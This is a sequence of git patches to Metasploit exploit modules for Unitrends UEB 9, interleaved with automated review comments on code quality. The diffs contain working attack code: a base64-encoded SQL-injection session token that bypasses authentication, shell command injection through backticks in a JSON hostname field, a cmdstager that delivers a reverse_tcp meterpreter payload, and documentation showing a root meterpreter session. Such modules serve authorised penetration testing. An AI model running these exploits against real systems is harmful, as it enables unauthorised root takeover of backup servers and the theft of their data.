From: caleBot Date: Fri, 20 Oct 2017 12:21:17 -0600 Subject: [PATCH 11/22] Update ueb9_bpserverd.md --- documentation/modules/exploit/linux/misc/ueb9_bpserverd.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md index 8421e38570..570b426afe 100644 --- a/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md +++ b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md @@ -7,7 +7,7 @@ something like this: 1. Connect to xinetd process (it's usually running on port 1743) - 2. This process will send something like: '?A,Connect36092' + 2. This process will send something like: `?A,Connect36092` 3. Initiate a second connection to the port specified in the packet from xinetd (36092 in this example) 4. send a specially crafted packet to xinetd, containing the @@ -69,4 +69,4 @@ meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > -``` \ No newline at end of file +``` From 8febde8291971ef902d870cec51fc60be50b36af Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 12:23:53 -0600 Subject: [PATCH 12/22] Update ueb9_api_storage.rb --- modules/exploits/linux/http/ueb9_api_storage.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 65267a3ee5..72ac83214c 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -3,9 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'openssl' -require 'base64' -require 'uri' + class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking From abc749e1e8f0fd94051b7befb3111bd07aa783c7 Mon Sep 17 00:00:00 2001 
From: caleBot Date: Fri, 20 Oct 2017 13:48:29 -0600 Subject: [PATCH 13/22] Update ueb9_api_storage.rb --- modules/exploits/linux/http/ueb9_api_storage.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 72ac83214c..bbcb7120c0 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -67,7 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote session = Base64.strict_encode64(session) #b64 encode session token #substitue the cmd into the hostname parameter - parms = "{\"type\":4,\"name\":\"_Stateless\",\"usage\":\"stateless\",\"build_filesystem\":1,\"properties\":{\"username\":\"aaaa\",\"password\":\"aaaa\",\"hostname\":\"`#{filter_bad_chars(cmd)}` &\",\"port\":\"2049\",\"protocol\":\"nfs\",\"share_name\":\"aaa\"}}" + parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| res = send_request_cgi({ @@ -77,11 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote 'encode_params' => false, 'data' => parms, 'headers' => - {'AuthToken' => session,} + {'AuthToken' => session,} }) - if res.code != 500 - print_error("Unexpected response") + if if res &&res.code != 500 + fail_with(Failure::UnexpectedReply,'Unexpected response') end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") From 5c0bcd8f0a00765bd7384b02408080abc88935b2 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 13:56:25 -0600 Subject: [PATCH 14/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) 
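Review bot: `res &&res.code != 500` in the second hunk lets the nil case fall through silently: when `send_request_cgi` returns nil (for example on a timeout) neither branch runs and `execute_command` returns as if the request had been answered as expected. Handling nil first keeps the reported result honest: `fail_with(Failure::Unreachable, "#{peer} - No response") unless res`, followed by `fail_with(Failure::UnexpectedReply, 'Unexpected response') if res.code != 500`; if a missing reply is normal for this request, a comment should say so instead. The added line also reads `if if res`, which will not parse, and the `{'AuthToken' => session,}` line is now indented as though it belonged to the previous key.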
diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index cc265a3710..ada6ede2a9 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -51,8 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end - def filter_bad_chars(cmd) - end def execute_command(cmd, opts = {}) @@ -82,13 +80,13 @@ class MetasploitModule < Msf::Exploit::Remote #parse out the bpd port returned, we will connect back on this port to send our cmd bpd_port = buf1[-8..-3].to_i - print_good("bpd port recieved: #{bpd_port.to_s}") - print_status("Connecting to #{bpd_port.to_s}") + print_good("bpd port recieved: #{bpd_port}") + vprint_status("Connecting to #{bpd_port}") s2 = connect(global = false, opts = {'RPORT'=>bpd_port}) - print_good("Connected!") + vprint_good('Connected!') - print_status("Sending command buffer to xinetd") + print_status('Sending command buffer to xinetd') s1.put(data) s2.get_once(-1,1).to_s @@ -104,6 +102,6 @@ class MetasploitModule < Msf::Exploit::Remote def exploit print_status("#{peer} - pwn'ng ueb 9....") - execute_cmdstager(:linemax => 200, :nodelete => true) + execute_cmdstager(:linemax => 200) end end From 16b6248943c0b6b56f45be8075a629c275405f02 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 13:58:12 -0600 Subject: [PATCH 15/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index ada6ede2a9..a2041e2adb 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb 
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote disconnect(s2) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + fail_with(Failure::Unreachable, "#{peer} - Connection to server failed") end end From e9ad5a7dca864e82e3df490653517cd757825484 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:05:15 -0600 Subject: [PATCH 16/22] Update ueb9_api_storage.rb --- modules/exploits/linux/http/ueb9_api_storage.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index bbcb7120c0..28a773cdd0 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -82,12 +82,12 @@ class MetasploitModule < Msf::Exploit::Remote {'AuthToken' => session,} }) - if if res &&res.code != 500 + if res &&res.code != 500 fail_with(Failure::UnexpectedReply,'Unexpected response') end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") - end + end def exploit print_status("#{peer} - pwn'ng ueb 9....") From 85152b5f1ec5276af748fd198848bd36394feeaf Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:28:52 -0600 Subject: [PATCH 17/22] added check function --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index a2041e2adb..5830cf118c 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb 
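Review bot: The rescue still binds `=> e`, but the new `fail_with` message drops it, so a refused connection, a timeout and an `::EOFError` all surface with the same text and nothing reaches the log any more. Including the exception keeps the cause visible: `fail_with(Failure::Unreachable, "#{peer} - Connection to server failed: #{e.class} #{e.message}")`. An `::EOFError` or `::Timeout::Error` after a successful connect is arguably not `Unreachable`, so that mapping may deserve its own clause. The `begin` this rescue belongs to starts above the hunk.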
@@ -51,6 +51,19 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end + def check + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + #parse out the bpd port returned + bpd_port = buf1[-8..-3].to_i + + #check if it's a valid port number (1-65534) + if bpd_port && bpd_port >= 1 && bpd_port <= 65535 + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + end def execute_command(cmd, opts = {}) From cce7bf3e191500a46b3ad4b7500d6a6a1784a0eb Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:33:46 -0600 Subject: [PATCH 18/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index 5830cf118c..bafbebe26a 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote else Exploit::CheckCode::Safe end - end + end def execute_command(cmd, opts = {}) From 8f622a5003ecf28070f012b896c346fb531e11c3 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:35:03 -0600 Subject: [PATCH 19/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index bafbebe26a..963ba47dff 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote buf1 = s1.get_once(-1).to_s #parse out the bpd port returned bpd_port = buf1[-8..-3].to_i - + #check if it's a valid port number (1-65534) if bpd_port && bpd_port >= 1 && bpd_port <= 65535 Exploit::CheckCode::Detected 
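Review bot: The port test in the added `check` (hunk `@@ -51,6 +51,19 @@`) disagrees with its own comment and carries a dead term: the comment says `1-65534` while the code accepts 65535, and `bpd_port &&` is always true because `to_i` returns an Integer (0 when the slice does not parse), never nil. `s1` is also never handed to `disconnect`, unlike `s2` in execute_command. I would write `if bpd_port.between?(1, 65535)`, correct the comment to `(1-65535)`, and add `disconnect(s1)` right after the read. Because `Detected` rests only on six characters of the banner parsing as a number in range, a short comment above the method saying so would keep readers from treating the result as confirmation. The uncorrected `1-65534` comment is carried unchanged through the whitespace hunk of PATCH 19/22.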
From c26779ef54a7fa45ce98d538d8d220f112360065 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:39:39 -0600 Subject: [PATCH 20/22] fixed msftidy issues --- modules/exploits/linux/http/ueb9_api_storage.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 28a773cdd0..fb31d093d6 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -68,8 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote #substitue the cmd into the hostname parameter parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| - parms << filter_bad_chars(cmd) - parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| res = send_request_cgi({ From 5abdfe3e59f75428e4c39d38e0710fde0e7de59c Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 20 Oct 2017 19:59:24 -0400 Subject: [PATCH 21/22] ueb9 style cleanup --- .../exploits/linux/http/ueb9_api_storage.rb | 22 ++++++++----------- modules/exploits/linux/misc/ueb9_bpserverd.rb | 13 +++++------ 2 files changed, 15 insertions(+), 20 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index fb31d093d6..ecbd7bea32 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## - - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking 
@@ -41,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote [ 'UEB 9.*', { } ] ], 'Privileged' => true, - 'DefaultOptions' => - { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', - 'SSL' => true - }, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => true + }, 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( @@ -62,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass session = Base64.strict_encode64(session) #b64 encode session token @@ -79,19 +76,18 @@ class MetasploitModule < Msf::Exploit::Remote 'encode_params' => false, 'data' => parms, 'headers' => - {'AuthToken' => session,} + {'AuthToken' => session} }) - if res &&res.code != 500 + if res && res.code != 500 fail_with(Failure::UnexpectedReply,'Unexpected response') end - rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") - end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end def exploit print_status("#{peer} - pwn'ng ueb 9....") execute_cmdstager(:linemax => 120) - end end diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index 963ba47dff..0e5e456c23 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb 
@@ -38,15 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote [ 'UEB 9.*', { } ] ], 'Privileged' => true, - 'DefaultOptions' => - { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', - 'SSL' => false - }, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => false + }, 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(1743), + register_options([ + Opt::RPORT(1743) ]) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end From fd028338e13ea560b562b6614359709e80260860 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 20 Oct 2017 20:08:11 -0400 Subject: [PATCH 22/22] move psh to polycom so no more powershell name collision --- .../misc/{psh_auth_bypass.md => polycom_hdx_auth_bypass.md} | 0 .../{misc/psh_auth_bypass.rb => polycom_hdx_auth_bypass.rb} | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) rename documentation/modules/exploit/unix/misc/{psh_auth_bypass.md => polycom_hdx_auth_bypass.md} (100%) rename modules/exploits/unix/{misc/psh_auth_bypass.rb => polycom_hdx_auth_bypass.rb} (99%) diff --git a/documentation/modules/exploit/unix/misc/psh_auth_bypass.md b/documentation/modules/exploit/unix/misc/polycom_hdx_auth_bypass.md similarity index 100% rename from documentation/modules/exploit/unix/misc/psh_auth_bypass.md rename to documentation/modules/exploit/unix/misc/polycom_hdx_auth_bypass.md diff --git a/modules/exploits/unix/misc/psh_auth_bypass.rb b/modules/exploits/unix/polycom_hdx_auth_bypass.rb similarity index 99% rename from modules/exploits/unix/misc/psh_auth_bypass.rb rename to modules/exploits/unix/polycom_hdx_auth_bypass.rb index efd720ef17..f53b3d776f 100644 --- a/modules/exploits/unix/misc/psh_auth_bypass.rb +++ b/modules/exploits/unix/polycom_hdx_auth_bypass.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote update_info( info, 'Name' => 'Polycom Command Shell Authorization Bypass', - 'Alias' => 'psh_auth_bypass', + 'Alias' => 'polycom_hdx_auth_bypass', 'Author' => [ 'Paul Haas ', # module